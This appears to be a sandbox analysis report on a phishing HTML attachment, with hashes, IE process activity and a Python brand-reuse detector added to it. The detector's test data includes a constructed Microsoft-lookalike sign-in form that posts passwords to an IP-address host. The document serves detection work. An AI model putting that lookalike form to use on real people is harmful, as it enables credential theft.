Analysis

  • max time kernel
    150s
  • max time network
    190s
  • platform
    windows7_x64
  • resource
    win7-en-20210920
  • submitted
    18-10-2021 16:28

General

  • Target

    PO#098273.html

  • Size

    3KB

  • MD5

    1f8ba9d2c06ce44c29fb3f67958d5bc5

  • SHA1

    d6063dad4bd7d9d270687efc564ea5b83d88155d

  • SHA256

    dd1aa00fd577744f0997758e64d2dbfa340da856a0ea5ded9935bd8a7953cb5a

  • SHA512

    1c4e59a6fb160cb7ee1bc277ccc53abc8ac4bc419828b3b27cf9677f5f7e19ff22d6ce59af09c3910b69312fc2e47c003ed9e6f02a868fbb3b0bcd61944e4d31

Score
5/10

Malware Config

Signatures

  • Detected potential entity reuse from brand microsoft (phishing heuristic: the page content imitates Microsoft branding).
  • Modifies Internet Explorer settings (1 TTP, 49 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (2 IoCs)
  • Suspicious use of FindShellTrayWindow (1 IoC)
  • Suspicious use of SetWindowsHookEx (64 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)

  Everything except the first signature is raised by iexplore.exe itself while rendering a local HTML file: writes under HKCU\Software\Microsoft\Internet Explorer, window hooks, tray-window lookups and the parent/child memory writes of the IE frame and tab processes are normal browser activity on a fresh sandbox profile, which is why the score stays at 5/10. The brand-reuse hit on a 3KB HTML attachment named like a purchase order is the finding that matters: treat the sample as a credential-phishing lure and check where any form on the page submits to.
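The brand-reuse signature is a content heuristic rather than a behavioural one. As an added illustration of how such a check works (this is not Triage's implementation; the two sample HTML pages, the brand allow-list BRAND_DOMAINS and the function names are constructed for this example), the following Python scans a saved HTML file for brand terms in its title, visible text and image alt attributes, then flags the page when a form that contains a password field submits anywhere other than a domain owned by that brand:

```python
"""Brand-reuse heuristic for a saved HTML attachment (added example, not a sandbox signature)."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Brands and the domains that may legitimately receive their sign-in forms.
# Assumption for this example: a short allow-list is enough to show the idea.
BRAND_DOMAINS = {
    "microsoft": ("microsoft.com", "microsoftonline.com", "live.com", "office.com", "outlook.com"),
}


class _PageScan(HTMLParser):
    """Collect the title, visible text, form targets and password inputs of a page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.text = []
        self.form_actions = []
        self.password_fields = 0
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "img" and a.get("alt"):
            self.text.append(a["alt"])  # the brand name often lives only in a logo's alt text

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data
        self.text.append(data)


def _hosted_by(host: str, domains) -> bool:
    return any(host == d or host.endswith("." + d) for d in domains)


def assess_brand_reuse(html: str) -> dict:
    """Flag pages that show a brand's name but send credentials somewhere else."""
    scan = _PageScan()
    scan.feed(html)
    blob = (scan.title + " " + " ".join(scan.text)).lower()
    brands = [b for b in BRAND_DOMAINS if b in blob]
    findings = []
    for brand in brands:
        for action in scan.form_actions:
            host = (urlparse(action).hostname or "").lower()
            if action.lower().startswith("javascript:"):
                findings.append(f"{brand}: form submitted via script, not to a {brand} domain")
            elif not _hosted_by(host, BRAND_DOMAINS[brand]):
                findings.append(f"{brand}: form posts to {host or '<relative/local>'}")
    return {
        "brands": brands,
        "password_fields": scan.password_fields,
        "form_actions": scan.form_actions,
        "findings": findings,
        # Only a credential form makes brand reuse actionable.
        "suspicious": bool(findings) and scan.password_fields > 0,
    }


# Constructed sample: a lookalike sign-in page posting to an unrelated host (not from the report).
PHISH_HTML = """<html><head><title>Microsoft Office 365 - Sign in</title></head><body>
<img src="logo.png" alt="Microsoft">
<form method="post" action="https://203.0.113.10/collect.php">
<input type="email" name="login"><input type="password" name="passwd">
<input type="submit" value="Sign in"></form></body></html>"""

# Constructed benign counterpart: same branding, but the form goes to a brand-owned domain.
BENIGN_HTML = """<html><head><title>Sign in to your Microsoft account</title></head><body>
<form method="post" action="https://login.microsoftonline.com/common/login">
<input type="password" name="passwd"></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("phish", PHISH_HTML), ("benign", BENIGN_HTML)):
        print(name, assess_brand_reuse(page))
```

Run it against the PO#098273.html dropped by the sandbox: a hit in `brands` together with a form action pointing at an IP address or an unrelated host is the same condition the signature reports. A kit that submits through script (an empty or `javascript:` action) is flagged too, because the heuristic keys on "not a brand-owned domain" rather than on a list of known-bad destinations, which is what makes it useful against kits you have not seen before.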

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\PO#098273.html
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1080
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1080 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1632

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Defense Evasion: Modify Registry (T1112), 1 signature ("Modifies Internet Explorer settings")


Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    MD5

    dfb0a8e57d235e5e50c0b83046662a0f

    SHA1

    47f0585da41d685471455d572b8f757ca0094e28

    SHA256

    ea8fbed9ae058f053779a3becfa6c5e6003d51e68918626cc9cbc51d3b875298

    SHA512

    a0ac1840bbadf8ccfacd8f6188d28392050a2e565ecad586a59a72fc7bcb542f6d3c1e84aeb2e0b53f18834723f54207bb57bb888373da9a759897d3ca0da314

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    MD5

    ab5c36d10261c173c5896f3478cdc6b7

    SHA1

    87ac53810ad125663519e944bc87ded3979cbee4

    SHA256

    f8e90fb0557fe49d7702cfb506312ac0b24c97802f9c782696db6d47f434e8e9

    SHA512

    e83e4eae44e7a9cbcd267dbfc25a7f4f68b50591e3bbe267324b1f813c9220d565b284994ded5f7d2d371d50e1ebfa647176ec8de9716f754c6b5785c6e897fa

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_1DC6D7385EA816C957BA2B715AC5C442
    MD5

    644f9c9d54649b90fcf6326cfa1c9574

    SHA1

    eba61b01329e2ce55b9f881cc92f56ce1effe7b6

    SHA256

    95b299ac73562a6346f5c2136167bff2763e4a601080226dd2c5704de5e99990

    SHA512

    76c0870dc687b5e554556b9b14a6577bb8f53771f5cdcbe0fd6a0d8e575e27a59801fcef785e84ec24c7c22ab92e69ba30298a8acce6c60a62affd0ba85614de

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    MD5

    2ad6acbb86561d29343bbad0aa9a15f7

    SHA1

    3940ad90a484ab1e0a979685a6f8e44668601b65

    SHA256

    e1fa4ce8cd112b57d5410dbb3103ab3247e07a53f727f1ef1e51b9e23471258c

    SHA512

    92db94677343be07bc41c8d0fb060aa1f89845f17df1fdb1306ec37cc4c4274bb07b583efca1246db4fe52e834a426e7d28889b9daeca5ce1f2272049d5844a5

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (same path as the previous entry, captured again after its content changed)
    MD5

    5f46a5e55eabb0e709aa7780c654038a

    SHA1

    44deba1eeefe332581d1e40b5f4bbf08f3dc8b67

    SHA256

    12a3fa92684f2cd977224bc4feddd4a455dff41083902dcc386af020fc0e6b77

    SHA512

    19370399d7ed116221ecabda766a144997a4446a625404a3d494641b9cff64208c65d6511400cc13cfd0cec30897a140df0b91df76a92d251a3f61dce9c1f337

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    MD5

    3b6c5208481794cac52caa807fe4e308

    SHA1

    a311e869065fa5dcd9ef71082fc4061d06c25096

    SHA256

    07e332187fe8986c468415c68a095eacba1c19a46ea02acec661bdf8014c29fe

    SHA512

    13366a7b1cf1375ec582e48454e64623d9a1e0c743f6b36f822467188e8d131558186027f496897728b9121e36da24a821445d18237b45b71f79699a89d0f871

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\wkz58mr\imagestore.dat
    MD5

    da0e1f89d29d371798bb9b599638c426

    SHA1

    ec3fe65415de76c658aa2f384f044e8e5172171a

    SHA256

    ee3b480105bfd120d9afa5fb7dcf6452cd212bd5f63d6000c37999b2a6998663

    SHA512

    9b5f4b3bed4368cb69980875dc60e09ddc7f79391c46cb6b1fd953b582cde694f10684d4bf12caf92af616be400b1c28dae4dda50c41aa20d6cb4be4170ee58b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\IK9RBSXP.txt
    MD5

    594459b9434e69497863cf9c37ae6f47

    SHA1

    33f9ee295c099217810cd51c4038237400af5e80

    SHA256

    e60f041b41aa0fff3ec3cc59e6a03353966ac54928e85d194dfbd239297cea42

    SHA512

    8033a9046ae0172c5f51db1a9f1c2b7673f200c478d7ec5657b06036714903ccba3a5af2480757cb850b8131d9d9b38bb7696491cee2b906e143b5ba3f220c67

  • memory/1080-53-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp
    Filesize

    8KB

  • memory/1632-54-0x0000000000000000-mapping.dmp